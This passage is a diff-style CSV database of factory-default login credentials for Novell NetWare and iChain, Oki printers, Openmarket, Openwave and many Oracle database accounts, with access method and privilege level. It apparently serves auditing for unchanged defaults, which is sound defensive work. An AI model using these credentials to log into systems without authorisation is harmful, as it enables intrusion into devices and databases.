+novell,Groupwise,,Servlet Mgr,servlet,manager,,, +novell,Groupwise,5.5 Enhancement Pack,HTTP,servlet,manager,Servlet Mgr,, +novell,Groupwise,6.0,HTTP,servlet,manager,Servlet Mgr,, +novell,NDS iMonitor,,,sadmin,,,, +novell,NDS iMonitor,,http,sadmin,,Admin,, +novell,NetWare,,,BACKUP,,,Any, +novell,NetWare,,,CHEY_ARCHSVR,WONDERLAND,,Arcserve, +novell,NetWare,,,GATE,,,Any, +novell,NetWare,,,GATEWAY,,,Any, +novell,NetWare,,,HPLASER,,,Any, +novell,NetWare,,,LASER,,,Any, +novell,NetWare,,,LASERWRITER,,,Any, +novell,NetWare,,,MAIL,,,Any, +novell,NetWare,,,POST,,,Any, +novell,NetWare,,,PRINT,,,any, +novell,NetWare,,,PRINTER,,,Any, +novell,NetWare,,,ROUTER,,,Any, +novell,NetWare,,,WINDOWS_PASSTHRU,,,Any, +novell,NetWare,,,guest,,,Any, +novell,Netware,,,ADMIN,,,, +novell,Netware,,,ADMIN,ADMIN,,, +novell,Netware,,,ARCHIVIST,,,, +novell,Netware,,,ARCHIVIST,ARCHIVIST,,, +novell,Netware,,,BACKUP,,,, +novell,Netware,,,BACKUP,BACKUP,,, +novell,Netware,,,CHEY_ARCHSVR,,,, +novell,Netware,,,CHEY_ARCHSVR,CHEY_ARCHSVR,,, +novell,Netware,,,FAX,,,, +novell,Netware,,,FAX,FAX,,, +novell,Netware,,,FAXUSER,,,, +novell,Netware,,,FAXUSER,FAXUSER,,, +novell,Netware,,,FAXWORKS,,,, +novell,Netware,,,FAXWORKS,FAXWORKS,,, +novell,Netware,,,GATEWAY,,,, +novell,Netware,,,GATEWAY,GATEWAY,,, +novell,Netware,,,GUEST,,,, +novell,Netware,,,GUEST,GUEST,,, +novell,Netware,,,GUEST,GUESTGUE,,, +novell,Netware,,,GUEST,GUESTGUEST,,, +novell,Netware,,,GUEST,TSEUG,,, +novell,Netware,,,HPLASER,,,, +novell,Netware,,,HPLASER,HPLASER,,, +novell,Netware,,,LASER,,,, +novell,Netware,,,LASER,LASER,,, +novell,Netware,,,LASERWRITER,,,, +novell,Netware,,,LASERWRITER,LASERWRITER,,, +novell,Netware,,,MAIL,,,, +novell,Netware,,,MAIL,MAIL,,, +novell,Netware,,,POST,,,, +novell,Netware,,,POST,POST,,, +novell,Netware,,,PRINT,,,, +novell,Netware,,,PRINT,PRINT,,, +novell,Netware,,,PRINTER,,,, +novell,Netware,,,PRINTER,PRINTER,,, +novell,Netware,,,ROOT,,,, +novell,Netware,,,ROOT,ROOT,,, +novell,Netware,,,ROUTER,,,, +novell,Netware,,,SABRE,,,, +novell,Netware,,,SUPERVISOR,,,, +novell,Netware,,,SUPERVISOR,HARRIS,,, +novell,Netware,,,SUPERVISOR,NETFRAME,,, +novell,Netware,,,SUPERVISOR,NF,,, +novell,Netware,,,SUPERVISOR,NFI,,, +novell,Netware,,,SUPERVISOR,SUPERVISOR,,, +novell,Netware,,,SUPERVISOR,SYSTEM,,, +novell,Netware,,,TEST,,,, +novell,Netware,,,TEST,TEST,,, +novell,Netware,,,USER_TEMPLATE,,,, +novell,Netware,,,USER_TEMPLATE,USER_TEMPLATE,,, +novell,Netware,,,WANGTEK,,,, +novell,Netware,,,WANGTEK,WANGTEK,,, +novell,Netware,,,WINDOWS_PASSTHRU,,,, +novell,Netware,,,WINDOWS_PASSTHRU,WINDOWS_PASSTHRU,,, +novell,Netware,,,WINSABRE,SABRE,,, +novell,Netware,,,WINSABRE,WINSABRE,,, +novell,Netware,,Multi,ADMIN,,,, +novell,Netware,,Multi,ADMIN,ADMIN,,, +novell,Netware,,Multi,ARCHIVIST,,,, +novell,Netware,,Multi,ARCHIVIST,ARCHIVIST,,, +novell,Netware,,Multi,BACKUP,,,, +novell,Netware,,Multi,BACKUP,BACKUP,,, +novell,Netware,,Multi,CHEY_ARCHSVR,,,, +novell,Netware,,Multi,CHEY_ARCHSVR,CHEY_ARCHSVR,,, +novell,Netware,,Multi,FAX,,,, +novell,Netware,,Multi,FAX,FAX,,, +novell,Netware,,Multi,FAXUSER,,,, +novell,Netware,,Multi,FAXUSER,FAXUSER,,, +novell,Netware,,Multi,FAXWORKS,,,, +novell,Netware,,Multi,FAXWORKS,FAXWORKS,,, +novell,Netware,,Multi,GATEWAY,,,, +novell,Netware,,Multi,GATEWAY,GATEWAY,,, +novell,Netware,,Multi,GUEST,,,, +novell,Netware,,Multi,GUEST,GUEST,,, +novell,Netware,,Multi,GUEST,GUESTGUE,,, +novell,Netware,,Multi,GUEST,GUESTGUEST,,, +novell,Netware,,Multi,GUEST,TSEUG,,, +novell,Netware,,Multi,HPLASER,,,, +novell,Netware,,Multi,HPLASER,HPLASER,,, +novell,Netware,,Multi,LASER,,,, +novell,Netware,,Multi,LASER,LASER,,, +novell,Netware,,Multi,LASERWRITER,,,, +novell,Netware,,Multi,LASERWRITER,LASERWRITER,,, +novell,Netware,,Multi,MAIL,,,, +novell,Netware,,Multi,MAIL,MAIL,,, +novell,Netware,,Multi,POST,,,, +novell,Netware,,Multi,POST,POST,,, +novell,Netware,,Multi,PRINT,,,, +novell,Netware,,Multi,PRINT,PRINT,,, +novell,Netware,,Multi,PRINTER,,,, +novell,Netware,,Multi,PRINTER,PRINTER,,, +novell,Netware,,Multi,ROOT,,,, +novell,Netware,,Multi,ROOT,ROOT,,, +novell,Netware,,Multi,ROUTER,,,, +novell,Netware,,Multi,SABRE,,,, +novell,Netware,,Multi,SUPERVISOR,,,, +novell,Netware,,Multi,SUPERVISOR,HARRIS,,, +novell,Netware,,Multi,SUPERVISOR,NETFRAME,,, +novell,Netware,,Multi,SUPERVISOR,NF,,, +novell,Netware,,Multi,SUPERVISOR,NFI,,, +novell,Netware,,Multi,SUPERVISOR,SUPERVISOR,,, +novell,Netware,,Multi,SUPERVISOR,SYSTEM,,, +novell,Netware,,Multi,TEST,,,, +novell,Netware,,Multi,TEST,TEST,,, +novell,Netware,,Multi,USER_TEMPLATE,,,, +novell,Netware,,Multi,USER_TEMPLATE,USER_TEMPLATE,,, +novell,Netware,,Multi,WANGTEK,,,, +novell,Netware,,Multi,WANGTEK,WANGTEK,,, +novell,Netware,,Multi,WINDOWS_PASSTHRU,,,, +novell,Netware,,Multi,WINDOWS_PASSTHRU,WINDOWS_PASSTHRU,,, +novell,Netware,,Multi,WINSABRE,SABRE,,, +novell,Netware,,Multi,WINSABRE,WINSABRE,,, +novell,iChain,,1.5,,san fran 8,,, +novell,iChain,,2,,cr0wmt 911,,, +novell,iChain,,Admin,,cr0wmt 911,,, +novell,iChain,,Admin,,san fran 8,,, +novell,iChain,1.5,Console,,san fran 8,Admin,, +novell,iChain,2.0,Console,,cr0wmt 911,Admin,, +novell,iChain/ICS,,1.2 2.0,,root,,, +novell,iChain/ICS,,Admin,,root,,, +novell,iChain/ICS,1.2 2.0,Telnet,,root,Admin,, +novell,iManager,,2.0.1,admin,novell,,, +novell,iManager,2.0.1,,,admin,novell,, +nrg,DSC338 Printer,1.19,HTTP,,password,Admin,no user, +nrg,SP C312DN,1.03,,Admin,,Administrator,, +nsi,vmXfw,,,root,nsi,Admin,, +nullsoft,Shoutcast,1.9.5,PLS,admin,changeme,Admin,, +nurit,PC BIOS,,,$system,,,, +nurit,PC BIOS,,Admin,$system,,,, +nurit,PC BIOS,,Console,$system,,Admin,, +oce,Printers,,Admin,,0 and the number of OCE printer,,, +oce,Printers,Hardware,HTTP,,0 and the number of OCE printer,Admin,, +oce,TCS500,All Versions,Console,oceservice,ser4OCE!,Technical/Admin,Reboot for normal user mode., +oce,TDS300,ALL,Direct,guest,RtFM!,,, +oce,TDS450,,,oceservice,ser4OCE!,tech/admin,, +oce,cm4010,,Web Console via IP Address,Administrator,admin,administrator level,, +oce,tcs500, Windows XP, all models,12.3.0(1668),console, http://192.168.0.81,, +ods,1094 IS Chassis,,,ods,ods,,4.x, +ods,1094,,,ods,ods,,, +oki,9600,,,admin,last six characters of the MAC address (letters uppercase).,,, +oki,B410dn,,http://169.254.39.211/,admin,Last 6 characters (chars uppercased) from MAC Address,admin,, +oki,B431dn,,http://192.168.1.xxx,root,123456,Admin,, +oki,B6300,,,root,last six charachter of mac address,root,, +oki,B720N,All versions,Web interface,root,aaaaaa,Root access,, +oki,C3450,,http://192.168.1.50,admin,heslo,admin,, +oki,C3450,,web,admin,last 6 digits of MAC code, Use uppercase letters,, +oki,C3530,,console,admin,last 6 digits of MAC address,Admin,, +oki,C5550 MFP,,http,,*blank*,Admin,, +oki,C5650,,Multi,root,Last 6 characters of MAC address (uppercase),Admin,Last 6 digits are also at the end of the default printer name, +oki,C5700,,HTTP,root,the 6 last digit of the MAC adress,Admin,running with other models, +oki,C5850,,http,admin,last 6 characters of the MAC ADRESS,,, +oki,C5900,,HTTP,root,Last 6 characters (chars uppercased) from MAC Address,admin,, +oki,C610,,,admin,aaaaaa,admin,, +oki,C6100,,HTTP,root,Last 6 characters of MAC address (uppercase),Administrative,seems to work with a variety of oki printers., +oki,C710,All versions,http,root,Last 6 characters (chars uppercased) from MAC Address,Full acces to printer configuration,, +oki,C7300,A3.14, may apply to other versions,Multi,root,Last six digits of default device name,, +oki,C7350,,Administrator,root,Last 6 characters (chars uppercased) from MAC Address,,, +oki,C7350,,Multi,root,Last 6 characters (chars uppercased) from MAC Address,Administrator,, +oki,C830,all,web,root,last 6 digits of the MAC address,,, +oki,C8800,,Web or Console,root,Last six characters of MAC address,,, +oki,C9500,,HTTP / telnet,root,Last 6 characters (chars uppercased) from MAC Address,Administration,, +oki,ES5460 MFP,,Local configuration menu,,aaaaaa,Admin/Root i guess,, +oki,ES7411,,web HTTP,admin,aaaaaa,Administrator,, +oki,ES8460,,http,admin,aaaaaa,,, +oki,MC360,,Console,admin,aaaaaa,Full acces to printer configuration,, +oki,MC360,,HTTP,admin,Last 6 characters (chars uppercased) from MAC Address,Administration,, +oki,MC560,,Printer Menu,,,,When asked for password, +oki,MC860,,Web interface,admin,aaaaaa,admin,, +oki,ML491n,,http://,Admin,OkiLAN,Admin,, +oki,b710,all,http://192.168.1.33,root,aaaaaa,Administrator,, +oki,c3450,All,Multi,admin,last 6 characters of the MAC ADRESS,Admin,no, +oki,c5300,,,root,last 6 characters of the MAC ADRESS "if it contains any alpha characters type them as upper case",,, +oki,c5300,,Console,root,last 6 characters of the MAC ADRESS "if it contains any alpha characters,type them as upper case",No, +oki,c5300,,Multi,root,last 6 characters of the MAC ADRESS "if it contains any alpha characters,type them as upper case",No, +oki,c5300,,admin,root,last 6 characters of the MAC ADRESS "if it contains any alpha characters type them as upper case",,, +olicom,8600,,9600,-,AaBbCcDd,,, +olicom,8600,all,Serial,-,AaBbCcDd,9600,, +olitec,sx 200 adsl modem router,,Multi,admin,adslolitec,Admin,default ip 192.168.0.250, +olitec,sx 202 adsl modem router,,HTTP,admin,admin,Admin,Firmware: 2.7.0.9(UE0.B1C)3.3.0.23, +omnitronix,Data-Link,DL150,Multi,,SMDR,Admin,, +omnitronix,Data-Link,DL150,Multi,,SUPER,Admin,, +omron,MR104FH,,Multi,,,Admin,, +oodie.com,odfaq,,admin,admin,admin,,, +oodiecom,odfaq,2.1.0,HTTP,admin,admin,admin,, +openconnect,OC://WebConnect Pro,,Multi,admin,OCS,Admin,, +openconnect,OC://WebConnect Pro,,Multi,adminstat,OCS,Admin,, +openconnect,OC://WebConnect Pro,,Multi,adminuser,OCS,Admin,, +openconnect,OC://WebConnect Pro,,Multi,adminview,OCS,Admin,, +openconnect,OC://WebConnect Pro,,Multi,helpdesk,OCS,Admin,, +openmarket,Content Server,,,Bobo,hello,,, +openmarket,Content Server,,,Coco,hello,,, +openmarket,Content Server,,,Flo,hello,,, +openmarket,Content Server,,,Joe,hello,,, +openmarket,Content Server,,,Moe,hello,,, +openmarket,Content Server,,,admin,demo,,, +openmarket,Content Server,,,user_analyst,demo,,, +openmarket,Content Server,,,user_approver,demo,,, +openmarket,Content Server,,,user_author,demo,,, +openmarket,Content Server,,,user_checker,demo,,, +openmarket,Content Server,,,user_designer,demo,,, +openmarket,Content Server,,,user_editor,demo,,, +openmarket,Content Server,,,user_expert,demo,,, +openmarket,Content Server,,,user_marketer,demo,,, +openmarket,Content Server,,,user_pricer,demo,,, +openmarket,Content Server,,,user_publisher,demo,,, +openmarket,Content Server,,http,Admin,demo,Admin,, +openmarket,Content Server,,http,Bobo,hello,,, +openmarket,Content Server,,http,Coco,hello,,, +openmarket,Content Server,,http,Flo,hello,,, +openmarket,Content Server,,http,Joe,hello,,, +openmarket,Content Server,,http,Moe,hello,,, +openmarket,Content Server,,http,user_analyst,demo,,, +openmarket,Content Server,,http,user_approver,demo,,, +openmarket,Content Server,,http,user_author,demo,,, +openmarket,Content Server,,http,user_checker,demo,,, +openmarket,Content Server,,http,user_designer,demo,,, +openmarket,Content Server,,http,user_editor,demo,,, +openmarket,Content Server,,http,user_expert,demo,,, +openmarket,Content Server,,http,user_marketer,demo,,, +openmarket,Content Server,,http,user_pricer,demo,,, +openmarket,Content Server,,http,user_publisher,demo,,, +openwave,MSP,,Admin,cac_admin,cacadmin,,, +openwave,MSP,,Any,cac_admin,cacadmin,,, +openwave,MSP,Any,HTTP,cac_admin,cacadmin,Admin,, +openwave,WAP Gateway,,Admin,sys,uplink,,, +openwave,WAP Gateway,,Any,sys,uplink,,, +openwave,WAP Gateway,Any,HTTP,sys,uplink,Admin,, +openxchange,Open-Xchange LDAP,Open source versions below 0.8.2,,mailadmin,secret,high risk,, +openxchange,Open-Xchange Server,5,,mailadmin,secret,Admin,, +optivision,Nac 3000 & 4000,,,root,mpegvideo,,any, +optivision,Nac 3000,,,root,mpegvideo,,, +optus,Counter-Strike,,1.3,Administrator,admin,,, +optus,Counter-Strike,,Admin,Administrator,admin,,, +optus,Counter-Strike,1.3,Multi,Administrator,admin,Admin,, +oracle corporation,Oracle,,,ABM,ABM,,, +oracle corporation,Oracle,,,ADAMS,WOOD,,, +oracle corporation,Oracle,,,ADLDEMO,ADLDEMO,,, +oracle corporation,Oracle,,,ADMIN,JETSPEED,,, +oracle corporation,Oracle,,,ADMINISTRATOR,ADMIN,,, +oracle corporation,Oracle,,,AHL,AHL,,, +oracle corporation,Oracle,,,AHM,AHM,,, +oracle corporation,Oracle,,,AK,AK,,, +oracle corporation,Oracle,,,ALHRO,XXX,,, +oracle corporation,Oracle,,,ALHRW,XXX,,, +oracle corporation,Oracle,,,ALR,ALR,,, +oracle corporation,Oracle,,,AMS,AMS,,, +oracle corporation,Oracle,,,AMV,AMV,,, +oracle corporation,Oracle,,,ANDY,SWORDFISH,,, +oracle corporation,Oracle,,,ANONYMOUS,ANONYMOUS,,, +oracle corporation,Oracle,,,AP,AP,,, +oracle corporation,Oracle,,,APPLMGR,APPLMGR,,, +oracle corporation,Oracle,,,APPLSYS,FND,,, +oracle corporation,Oracle,,,APPLSYSPUB,FNDPUB,,, +oracle corporation,Oracle,,,APPLYSYSPUB,PUB,,, +oracle corporation,Oracle,,,APPS,APPS,,, +oracle corporation,Oracle,,,APPS_MRC,APPS,,, +oracle corporation,Oracle,,,APPUSER,APPPASSWORD,,, +oracle corporation,Oracle,,,AQ,AQ,,, +oracle corporation,Oracle,,,AQDEMO,AQDEMO,,, +oracle corporation,Oracle,,,AQJAVA,AQJAVA,,, +oracle corporation,Oracle,,,AQUSER,AQUSER,,, +oracle corporation,Oracle,,,AR,AR,,, +oracle corporation,Oracle,,,ASF,ASF,,, +oracle corporation,Oracle,,,ASG,ASG,,, +oracle corporation,Oracle,,,ASL,ASL,,, +oracle corporation,Oracle,,,ASO,ASO,,, +oracle corporation,Oracle,,,ASP,ASP,,, +oracle corporation,Oracle,,,AST,AST,,, +oracle corporation,Oracle,,,ATM,SAMPLEATM,,, +oracle corporation,Oracle,,,AUDIOUSER,AUDIOUSER,,, +oracle corporation,Oracle,,,AURORA$JIS$UTILITY$,INVALID,,, +oracle corporation,Oracle,,,AURORA$ORB$UNAUTHENTICATED,,,, +oracle corporation,Oracle,,,AX,AX,,, +oracle corporation,Oracle,,,AZ,AZ,,, +oracle corporation,Oracle,,,BC4J,BC4J,,, +oracle corporation,Oracle,,,BEN,BEN,,, +oracle corporation,Oracle,,,BIC,BIC,,, +oracle corporation,Oracle,,,BIL,BIL,,, +oracle corporation,Oracle,,,BIM,BIM,,, +oracle corporation,Oracle,,,BIS,BIS,,, +oracle corporation,Oracle,,,BIV,BIV,,, +oracle corporation,Oracle,,,BIX,BIX,,, +oracle corporation,Oracle,,,BLAKE,PAPER,,, +oracle corporation,Oracle,,,BLEWIS,BLEWIS,,, +oracle corporation,Oracle,,,BOM,BOM,,, +oracle corporation,Oracle,,,BRIO_ADMIN,BRIO_ADMIN,,, +oracle corporation,Oracle,,,BRUGERNAVN,ADGANGSKODE,,, +oracle corporation,Oracle,,,BRUKERNAVN,PASSWORD,,, +oracle corporation,Oracle,,,BSC,BSC,,, +oracle corporation,Oracle,,,BUG_REPORTS,BUG_REPORTS,,, +oracle corporation,Oracle,,,CALVIN,HOBBES,,, +oracle corporation,Oracle,,,CATALOG,CATALOG,,, +oracle corporation,Oracle,,,CCT,CCT,,, +oracle corporation,Oracle,,,CDEMO82,UNKNOWN,,, +oracle corporation,Oracle,,,CDEMOCOR,CDEMOCOR,,, +oracle corporation,Oracle,,,CDEMORID,CDEMORID,,, +oracle corporation,Oracle,,,CDEMOUCB,CDEMOUCB,,, +oracle corporation,Oracle,,,CDOUGLAS,CDOUGLAS,,, +oracle corporation,Oracle,,,CE,CE,,, +oracle corporation,Oracle,,,CENTRA,CENTRA,,, +oracle corporation,Oracle,,,CENTRAL,CENTRAL,,, +oracle corporation,Oracle,,,CIDS,CIDS,,, +oracle corporation,Oracle,,,CIS,ZWERG,,, +oracle corporation,Oracle,,,CISINFO,ZWERG,,, +oracle corporation,Oracle,,,CLARK,CLOTH,,, +oracle corporation,Oracle,,,CLKANA,,,, +oracle corporation,Oracle,,,CLKRT,,,, +oracle corporation,Oracle,,,CN,CN,,, +oracle corporation,Oracle,,,COMPANY,COMPANY,,, +oracle corporation,Oracle,,,COMPIERE,COMPIERE,,, +oracle corporation,Oracle,,,CQSCHEMAUSER,PASSWORD,,, +oracle corporation,Oracle,,,CQUSERDBUSER,PASSWORD,,, +oracle corporation,Oracle,,,CRP,CRP,,, +oracle corporation,Oracle,,,CS,CS,,, +oracle corporation,Oracle,,,CSC,CSC,,, +oracle corporation,Oracle,,,CSD,CSD,,, +oracle corporation,Oracle,,,CSE,CSE,,, +oracle corporation,Oracle,,,CSF,CSF,,, +oracle corporation,Oracle,,,CSI,CSI,,, +oracle corporation,Oracle,,,CSL,CSL,,, +oracle corporation,Oracle,,,CSMIG,CSMIG,,, +oracle corporation,Oracle,,,CSP,CSP,,, +oracle corporation,Oracle,,,CSR,CSR,,, +oracle corporation,Oracle,,,CSS,CSS,,, +oracle corporation,Oracle,,,CTXDEMO,CTXDEMO,,, +oracle corporation,Oracle,,,CTXSYS,UNKNOWN,,, +oracle corporation,Oracle,,,CUA,CUA,,, +oracle corporation,Oracle,,,CUE,CUE,,, +oracle corporation,Oracle,,,CUF,CUF,,, +oracle corporation,Oracle,,,CUG,CUG,,, +oracle corporation,Oracle,,,CUI,CUI,,, +oracle corporation,Oracle,,,CUN,CUN,,, +oracle corporation,Oracle,,,CUP,CUP,,, +oracle corporation,Oracle,,,CUS,CUS,,, +oracle corporation,Oracle,,,CZ,CZ,,, +oracle corporation,Oracle,,,DATA_SCHEMA,LASKJDF098KSDAF09,,, +oracle corporation,Oracle,,,DBI,MUMBLEFRATZ,,, +oracle corporation,Oracle,,,DBSNMP,DBSNMP,,, +oracle corporation,Oracle,,,DBVISION,DBVISION,,, +oracle corporation,Oracle,,,DCM,,,, +oracle corporation,Oracle,,,DDIC,199220706,,, +oracle corporation,Oracle,,,DEMO,DEMO,,, +oracle corporation,Oracle,,,DEMO8,DEMO8,,, +oracle corporation,Oracle,,,DEMO9,DEMO9,,, +oracle corporation,Oracle,,,DES,DES,,, +oracle corporation,Oracle,,,DES2K,DES2K,,, +oracle corporation,Oracle,,,DEV2000_DEMOS,DEV2000_DEMOS,,, +oracle corporation,Oracle,,,DIANE,PASSWO1,,, +oracle corporation,Oracle,,,DIP,DIP,,, +oracle corporation,Oracle,,,DISCOVERER5,,,, +oracle corporation,Oracle,,,DISCOVERER_ADMIN,DISCOVERER_ADMIN,,, +oracle corporation,Oracle,,,DMSYS,DMSYS,,, +oracle corporation,Oracle,,,DPF,DPFPASS,,, +oracle corporation,Oracle,,,DSGATEWAY,,,, +oracle corporation,Oracle,,,DSSYS,DSSYS,,, +oracle corporation,Oracle,,,DTSP,DTSP,,, +oracle corporation,Oracle,,,EAA,EAA,,, +oracle corporation,Oracle,,,EAM,EAM,,, +oracle corporation,Oracle,,,EARLYWATCH,SUPPORT,,, +oracle corporation,Oracle,,,EAST,EAST,,, +oracle corporation,Oracle,,,EC,EC,,, +oracle corporation,Oracle,,,ECX,ECX,,, +oracle corporation,Oracle,,,EJB,EJB,,, +oracle corporation,Oracle,,,EJSADMIN,EJSADMIN,,, +oracle corporation,Oracle,,,EMP,EMP,,, +oracle corporation,Oracle,,,ENG,ENG,,, +oracle corporation,Oracle,,,ENI,ENI,,, +oracle corporation,Oracle,,,ESTOREUSER,ESTORE,,, +oracle corporation,Oracle,,,EVENT,EVENT,,, +oracle corporation,Oracle,,,EVM,EVM,,, +oracle corporation,Oracle,,,EXAMPLE,EXAMPLE,,, +oracle corporation,Oracle,,,EXFSYS,EXFSYS,,, +oracle corporation,Oracle,,,EXTDEMO,EXTDEMO,,, +oracle corporation,Oracle,,,EXTDEMO2,EXTDEMO2,,, +oracle corporation,Oracle,,,FA,FA,,, +oracle corporation,Oracle,,,FEM,FEM,,, +oracle corporation,Oracle,,,FII,FII,,, +oracle corporation,Oracle,,,FINANCE,FINANCE,,, +oracle corporation,Oracle,,,FINPROD,FINPROD,,, +oracle corporation,Oracle,,,FLM,FLM,,, +oracle corporation,Oracle,,,FND,FND,,, +oracle corporation,Oracle,,,FOO,BAR,,, +oracle corporation,Oracle,,,FPT,FPT,,, +oracle corporation,Oracle,,,FRM,FRM,,, +oracle corporation,Oracle,,,FROSTY,SNOWMAN,,, +oracle corporation,Oracle,,,FTE,FTE,,, +oracle corporation,Oracle,,,FV,FV,,, +oracle corporation,Oracle,,,GL,GL,,, +oracle corporation,Oracle,,,GMA,GMA,,, +oracle corporation,Oracle,,,GMD,GMD,,, +oracle corporation,Oracle,,,GME,GME,,, +oracle corporation,Oracle,,,GMF,GMF,,, +oracle corporation,Oracle,,,GMI,GMI,,, +oracle corporation,Oracle,,,GML,GML,,, +oracle corporation,Oracle,,,GMP,GMP,,, +oracle corporation,Oracle,,,GMS,GMS,,, +oracle corporation,Oracle,,,GPFD,GPFD,,, +oracle corporation,Oracle,,,GPLD,GPLD,,, +oracle corporation,Oracle,,,GR,GR,,, +oracle corporation,Oracle,,,HADES,HADES,,, +oracle corporation,Oracle,,,HCPARK,HCPARK,,, +oracle corporation,Oracle,,,HLW,HLW,,, +oracle corporation,Oracle,,,HR,HR,,, +oracle corporation,Oracle,,,HRI,HRI,,, +oracle corporation,Oracle,,,HVST,HVST,,, +oracle corporation,Oracle,,,HXC,HXC,,, +oracle corporation,Oracle,,,HXT,HXT,,, +oracle corporation,Oracle,,,IBA,IBA,,, +oracle corporation,Oracle,,,IBE,IBE,,, +oracle corporation,Oracle,,,IBP,IBP,,, +oracle corporation,Oracle,,,IBU,IBU,,, +oracle corporation,Oracle,,,IBY,IBY,,, +oracle corporation,Oracle,,,ICDBOWN,ICDBOWN,,, +oracle corporation,Oracle,,,ICX,ICX,,, +oracle corporation,Oracle,,,IDEMO_USER,IDEMO_USER,,, +oracle corporation,Oracle,,,IEB,IEB,,, +oracle corporation,Oracle,,,IEC,IEC,,, +oracle corporation,Oracle,,,IEM,IEM,,, +oracle corporation,Oracle,,,IEO,IEO,,, +oracle corporation,Oracle,,,IES,IES,,, +oracle corporation,Oracle,,,IEU,IEU,,, +oracle corporation,Oracle,,,IEX,IEX,,, +oracle corporation,Oracle,,,IFSSYS,IFSSYS,,, +oracle corporation,Oracle,,,IGC,IGC,,, +oracle corporation,Oracle,,,IGF,IGF,,, +oracle corporation,Oracle,,,IGI,IGI,,, +oracle corporation,Oracle,,,IGS,IGS,,, +oracle corporation,Oracle,,,IGW,IGW,,, +oracle corporation,Oracle,,,IMAGEUSER,IMAGEUSER,,, +oracle corporation,Oracle,,,IMC,IMC,,, +oracle corporation,Oracle,,,IMEDIA,IMEDIA,,, +oracle corporation,Oracle,,,IMT,IMT,,, +oracle corporation,Oracle,,,INTERNAL,SYS_STNT,,, +oracle corporation,Oracle,,,INV,INV,,, +oracle corporation,Oracle,,,IPA,IPA,,, +oracle corporation,Oracle,,,IPD,IPD,,, +oracle corporation,Oracle,,,IPLANET,IPLANET,,, +oracle corporation,Oracle,,,ISC,ISC,,, +oracle corporation,Oracle,,,ITG,ITG,,, +oracle corporation,Oracle,,,JA,JA,,, +oracle corporation,Oracle,,,JAKE,PASSWO4,,, +oracle corporation,Oracle,,,JE,JE,,, +oracle corporation,Oracle,,,JG,JG,,, +oracle corporation,Oracle,,,JILL,PASSWO2,,, +oracle corporation,Oracle,,,JL ,JL ,,, +oracle corporation,Oracle,,,JMUSER,JMUSER,,, +oracle corporation,Oracle,,,JOHN,JOHN,,, +oracle corporation,Oracle,,,JONES,STEEL,,, +oracle corporation,Oracle,,,JTF,JTF,,, +oracle corporation,Oracle,,,JTM,JTM,,, +oracle corporation,Oracle,,,JTS,JTS,,, +oracle corporation,Oracle,,,JWARD,AIROPLANE,,, +oracle corporation,Oracle,,,KWALKER,KWALKER,,, +oracle corporation,Oracle,,,L2LDEMO,L2LDEMO,,, +oracle corporation,Oracle,,,LBACSYS,LBACSYS,,, +oracle corporation,Oracle,,,LIBRARIAN,SHELVES,,, +oracle corporation,Oracle,,,MANPROD,MANPROD,,, +oracle corporation,Oracle,,,MARK,PASSWO3,,, +oracle corporation,Oracle,,,MASCARM,MANAGER,,, +oracle corporation,Oracle,,,MASTER,PASSWORD,,, +oracle corporation,Oracle,,,MDDATA,MDDATA,,, +oracle corporation,Oracle,,,MDDEMO,MDDEMO,,, +oracle corporation,Oracle,,,MDDEMO_CLERK,MGR,,, +oracle corporation,Oracle,,,MDDEMO_MGR,MGR,,, +oracle corporation,Oracle,,,MDSYS,MDSYS,,, +oracle corporation,Oracle,,,ME,ME,,, +oracle corporation,Oracle,,,MFG,MFG,,, +oracle corporation,Oracle,,,MGR,MGR,,, +oracle corporation,Oracle,,,MGWUSER,MGWUSER,,, +oracle corporation,Oracle,,,MIGRATE,MIGRATE,,, +oracle corporation,Oracle,,,MILLER,MILLER,,, +oracle corporation,Oracle,,,MMO2,UNKNOWN,,, +oracle corporation,Oracle,,,MODTEST,YES,,, +oracle corporation,Oracle,,,MOREAU,MOREAU,,, +oracle corporation,Oracle,,,MRP,MRP,,, +oracle corporation,Oracle,,,MSC,MSC,,, +oracle corporation,Oracle,,,MSD,MSD,,, +oracle corporation,Oracle,,,MSO,MSO,,, +oracle corporation,Oracle,,,MSR,MSR,,, +oracle corporation,Oracle,,,MTSSYS,MTSSYS,,, +oracle corporation,Oracle,,,MTS_USER,MTS_PASSWORD,,, +oracle corporation,Oracle,,,MWA,MWA,,, +oracle corporation,Oracle,,,MXAGENT,MXAGENT,,, +oracle corporation,Oracle,,,NAMES,NAMES,,, +oracle corporation,Oracle,,,NEOTIX_SYS,NEOTIX_SYS,,, +oracle corporation,Oracle,,,NNEUL,NNEULPASS,,, +oracle corporation,Oracle,,,NOMEUTENTE,PASSWORD,,, +oracle corporation,Oracle,,,NOME_UTILIZADOR,SENHA,,, +oracle corporation,Oracle,,,NOM_UTILISATEUR,MOT_DE_PASSE,,, +oracle corporation,Oracle,,,NUME_UTILIZATOR,PAROL,,, +oracle corporation,Oracle,,,OAIHUB902,,,, +oracle corporation,Oracle,,,OAS_PUBLIC,,,, +oracle corporation,Oracle,,,OCITEST,OCITEST,,, +oracle corporation,Oracle,,,OCM_DB_ADMIN,OCM_DB_ADMIN,,, +oracle corporation,Oracle,,,ODM,ODM,,, +oracle corporation,Oracle,,,ODM_MTR,MTRPW,,, +oracle corporation,Oracle,,,ODS,ODS,,, +oracle corporation,Oracle,,,ODSCOMMON,ODSCOMMON,,, +oracle corporation,Oracle,,,ODS_SERVER,ODS_SERVER,,, +oracle corporation,Oracle,,,OE,OE,,, +oracle corporation,Oracle,,,OEMADM,OEMADM,,, +oracle corporation,Oracle,,,OEMREP,OEMREP,,, +oracle corporation,Oracle,,,OEM_REPOSITORY,,,, +oracle corporation,Oracle,,,OKB,OKB,,, +oracle corporation,Oracle,,,OKC,OKC,,, +oracle corporation,Oracle,,,OKE,OKE,,, +oracle corporation,Oracle,,,OKI,OKI,,, +oracle corporation,Oracle,,,OKO,OKO,,, +oracle corporation,Oracle,,,OKR,OKR,,, +oracle corporation,Oracle,,,OKS,OKS,,, +oracle corporation,Oracle,,,OKX,OKX,,, +oracle corporation,Oracle,,,OLAPDBA,OLAPDBA,,, +oracle corporation,Oracle,,,OLAPSVR,INSTANCE,,, +oracle corporation,Oracle,,,OLAPSYS,MANAGER,,, +oracle corporation,Oracle,,,OMWB_EMULATION,ORACLE,,, +oracle corporation,Oracle,,,ONT,ONT,,, +oracle corporation,Oracle,,,OO,OO,,, +oracle corporation,Oracle,,,OPENSPIRIT,OPENSPIRIT,,, +oracle corporation,Oracle,,,OPI,OPI,,, +oracle corporation,Oracle,,,ORACACHE,,,, +oracle corporation,Oracle,,,ORACLE,ORACLE,,, +oracle 